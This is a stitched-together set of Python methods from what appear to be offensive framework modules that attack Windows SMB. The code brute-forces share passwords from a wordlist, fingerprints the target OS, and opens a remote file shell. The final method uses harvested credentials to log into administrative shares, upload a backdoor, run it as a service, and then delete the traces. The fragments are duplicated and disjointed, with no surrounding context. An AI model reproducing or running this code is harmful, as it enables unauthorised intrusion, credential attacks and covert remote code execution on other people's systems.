def test(self): """ Connect to the target and spawn a vfs-shell if we get a connection """ self.getargs() self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\ (NAME,self.host,self.port,self.covertness)) self.log("Using domain=%s user=%s, password %s" % (self.domain, self.user, self.password)) smbobj = msrpc.SMB(self.host, port=self.port, getsock=self) smbobj.covertness = self.covertness smbobj.username = self.user smbobj.password = self.password smbobj.domain = self.domain ret = smbobj.connect() if not ret: self.log("Could not connect to remote host: %s" % smbobj.errormsg) return 0 self.log("Trying treeconnect_AndX on share %s" % self.filename) ret = smbobj.treeconnect(self.filename) if not ret: self.log("Failed to connect to share!") return 0 self.log("Connected to share %s" % self.filename) smbobj.close() return 1
def run(self): self.getArgs() self.log('%s running against %s:%s covertness: %d' % (NAME, self.host, self.port, self.covertness)) self.setInfo('%s attacking %s:%s (Covertness:%d) - running' % (NAME, self.host, self.port, self.covertness)) #self.log('Using user=%s, password=%s'%(self.user,self.password)) try: passwords = file(self.filename).readlines() except: self.log('Failed to open password file %s' % (self.filename)) return 0 passwords.insert(0, self.user) passwords.insert(0, '') for password in passwords: if self.state == self.HALT: self.log('Halted') return 0 password = password.strip() smbobj = msrpc.SMB(self.host, getsock=self) smbobj.covertness = self.covertness smbobj.username = self.user smbobj.password = password ret = smbobj.connect() if not ret: self.log('Could not connect to remote host as "%s":"%s"' % (self.user, password)) continue self.log('Trying TreeConnect_AndX on share %s' % self.share) ret = smbobj.treeconnect(self.share) if not ret: self.log('Failed to connect to share as "%s":"%s"!' % (self.user, password)) continue self.log('Connected to share %s with "%s":"%s"' % (self.share, self.user, password)) self.log('Done with exploit') self.setInfo( '%s attacking %s:%d (Covertness:%d) - done (found:%s:%s)' % (NAME, self.host, self.port, self.covertness, self.user, password)) return 1 self.setInfo('%s attacking %s:%d (Covertness:%d) - done (failed)' % (NAME, self.host, self.port, self.covertness)) return 0
def test(self): self.getArgs() self.log('%s running against %s:%s covertness: %d' % (NAME, self.host, self.port, self.covertness)) self.setInfo('%s attacking %s:%s (Covertness:%d) - running' % (NAME, self.host, self.port, self.covertness)) #self.log('Using user=%s, password=%s'%(self.user,self.password)) smbobj = msrpc.SMB(self.host, getsock=self) smbobj.covertness = self.covertness smbobj.username = self.user smbobj.password = self.password ret = smbobj.connect() if not ret: self.log('Could not connect to remote host') return 0 self.log('Trying treeconnect_AndX on share %s' % (self.share)) ret = smbobj.treeconnect(self.share) if not ret: self.log('Failed to connect to share!') return 0 self.log('Connected to share %s' % (self.share)) smbobj.close() return 1
def do_smb(self): """ do windows SMB detection """ result = None self.log("SMB DETECT: Doing SMB OS Detection") #set default port here for port in [139, 445]: smbobj = msrpc.SMB(self.host, port=port, getsock=self) smbobj.covertness = self.covertness smbobj.username = self.user smbobj.password = self.password ret = smbobj.connect() self.log('SMB DETECT: SMB OS Detection (port=%d) returned %s' % (port, smbobj.os)) if smbobj.lanman.lower() != 'unknown': self.log("SMB DETECT: Adding lanman knowledge: %s" % smbobj.lanman) self.target.add_knowledge("Lanman", smbobj.lanman, 100) self.log("SMB DETECT: Adding domain knowledge: %s" % smbobj.domain) self.target.add_knowledge("SMBDomain", smbobj.domain, 100) self.log("SMB DETECT: Adding server knowledge: %s" % smbobj.server) self.target.add_knowledge("SMBServer", smbobj.server, 100) break # check native OS, assume Linux for SAMBA if 'UNIX' in smbobj.os.upper(): #When you assume... #if 'SAMBA' in smbobj.lanman.upper(): # self.log("SMB DETECT: found Unix SAMBA, assuming Linux OS") # result = canvasos.new("Linux") if 'SUSE' in smbobj.lanman.upper(): result = canvasos.new("Linux") result.version = "SuSE" # Windows SMB muck elif 'VISTA' in smbobj.os.upper(): result = canvasos.new('Windows') result.version = 'Vista' for subversion in ['Ultimate']: if smbobj.os.find(subversion) != -1: result.family = subversion elif 'LAN MANAGER 4.0' in smbobj.os.upper(): result = canvasos.new('Windows') result.version = 'NT 4.0' elif 'WINDOWS' in smbobj.os.upper(): result = canvasos.new('Windows') if smbobj.os.find('Windows 5.0') != -1: result.version = '2000' elif smbobj.os.find('Windows 5.1') != -1: result.version = 'XP' elif smbobj.os.find('Windows .NET 5.2') != -1: result.version = '.NET RC2' elif smbobj.os.find('Windows NT 4.0') != -1: result.version = 'NT' elif smbobj.os.find('Windows 4.0') != -1: result.version = '9x' elif smbobj.os.find('Windows Server 2003') != -1: result.version = '2003' if smbobj.os.find('Service Pack 1') != -1: result.servicepack.append('SP1') elif smbobj.os.find('Service Pack 2') != -1: result.servicepack.append('SP2') else: result.servicepack.append('SP0') return result
def run(self): """ Connect to the target and spawn a vfs-shell if we get a connection """ self.result = [] self.getargs() self.log("%s running against %s:%d covertness: %d" %\ (NAME,self.host,self.port,self.covertness)) self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\ (NAME,self.host,self.port,self.covertness)) self.log("Using domain=%s user=%s, password %s" %\ (self.domain,self.user,self.password)) smbobj = msrpc.SMB(self.host, port=self.port, getsock=self) smbobj.covertness = self.covertness smbobj.username = self.user smbobj.password = self.password smbobj.domain = self.domain ret = smbobj.connect() if not ret: self.log("Could not connect to remote host: %s" % smbobj.errormsg) if self.port != 445: smbobj.port = 445 self.log("Attempting to try port 445.") ret = smbobj.connect() if not ret: return 0 else: return 0 self.log("Successfully connected to %s:%d" % (self.host, smbobj.port)) self.log("Trying treeconnect_AndX on share %s" % self.filename) ret = smbobj.treeconnect(self.filename) if not ret: # Try again with port 445 if smbobj.port != 445: smbobj.port = 445 ret = smbobj.connect() if not ret: return 0 else: ret = smbobj.treeconnect(self.filename) if not ret: self.log("Failed to connect to share!") return 0 else: self.log("Failed to connect to share!") return 0 self.log("Connected to share %s" % self.filename) if not smbobj.checkdirectory("\\"): self.log("Can't check directory on that share. :<") else: self.log("Checkdirectory \\ passed...") node = VFSNode() node.parentnode = self.argsDict["passednodes"][0] newshell = smbshell(smbobj, node, self.logfunction) self.setInfo("%s attacking %s:%d (Covertness:%d) - done" %\ (NAME,self.host,self.port,self.covertness)) self.result = [node] return node
def run(self): self.getargs() self.maketrojan() self.log('[D2] %s running against %s:%d covertness: %d' % (NAME, self.host, self.port, self.covertness)) self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - running' % (NAME, self.host, self.port, self.covertness)) listaccount = {} if self.msrpcuser and self.msrpcpassword: listaccount[self.msrpcuser] = self.msrpcpassword if self.credentfile: lines = open(self.credentfile, 'r').readlines() for line in lines: user, passwd = line[:-1].split(':') listaccount[user] = passwd for user, passwd in listaccount.items(): self.msrpcuser = user self.msrpcpassword = passwd self.smbobj = msrpc.SMB(self.host, port=self.port, getsock=self) self.smbobj.covertness = self.covertness self.smbobj.username = self.msrpcuser self.smbobj.password = self.msrpcpassword self.smbobj.domain = self.domain ret = self.smbobj.connect() if not ret: continue self.log('[D2] Using domain=%s user=%s, password=%s' % (self.domain, self.msrpcuser, self.msrpcpassword)) sharelist = ["ADMIN$", "C$", "D$", "E$"] shareenum = self.run_module('shareenum') for share in shareenum: name, desc = str(share).split(':') if name not in sharelist: sharelist.append(name) self.log('[D2] Trying to log into %s file share' % (', '.join(sharelist))) for sharename in sharelist: if not self.connect_to_share(sharename): continue if not self.upload_backdoor(): continue scm = self.create_service(sharename) if scm == None: continue handler = self.open_service(scm) if handler == None: continue self.start_service(handler) time.sleep(10) self.stop_service(handler) self.delete_service(handler) self.CloseServiceHandle(handler) self.CloseServiceHandle(scm) time.sleep(10) os.unlink(self.srcbin) self.delete_backdoor() time.sleep(10) self.myDCE.close() self.smbobj.s.close() self.log('[D2] Done with exploit') self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - done' % (NAME, self.host, self.port, self.covertness)) return 1 self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - failed' % (NAME, self.host, self.port, self.covertness))